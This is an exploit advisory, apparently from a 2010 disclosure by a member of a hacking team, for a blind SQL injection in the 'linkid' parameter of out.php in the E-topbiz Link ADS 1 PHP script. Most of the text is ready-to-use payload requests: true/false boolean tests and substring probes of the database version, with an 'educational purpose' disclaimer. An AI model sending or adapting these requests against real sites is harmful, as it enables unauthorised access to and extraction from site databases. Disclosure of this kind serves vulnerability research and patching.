Etopbiz Link ADS 1 PHP script linkid Blind SQL Injection Vulnerability.pdf

1 # E−topbiz Link ADS 1 PHP script (linkid) Blind SQL Injection Vulnerability 2 # url: http://e−topbiz.com/oprema/pages/linkads1.php 3 # 4 # Author: Jose Luis Gongora Fernandez ’aka’ JosS 5 # mail: sys−project[at]hotmail[dot]com 6 # site: http://hack0wn.com 7 # team: Spanish Hackers Team − [SHT] 8 # 9 # This was written for educational purpose. Use it at your own risk. 10 # Author will be not responsible for any damage. 11 # 12 # Greetz To: All Hackers! 13 14 proof of concept: 15 GET /out.php?linkid=50+and+1=1 (true) 16 GET /out.php?linkid=50+and+1=2 (false) 17 18 exploit : 19 GET /out.php?linkid=50+and+substring(@@version,1,1)=4 20 GET /out.php?linkid=50+and+substring(@@version,1,1)=5 21 22 23 # _h0_ Page 1/1 Etopbiz Link ADS 1 PHP script linkid Blind SQL Injection Vulnerability JosS 03/05/2010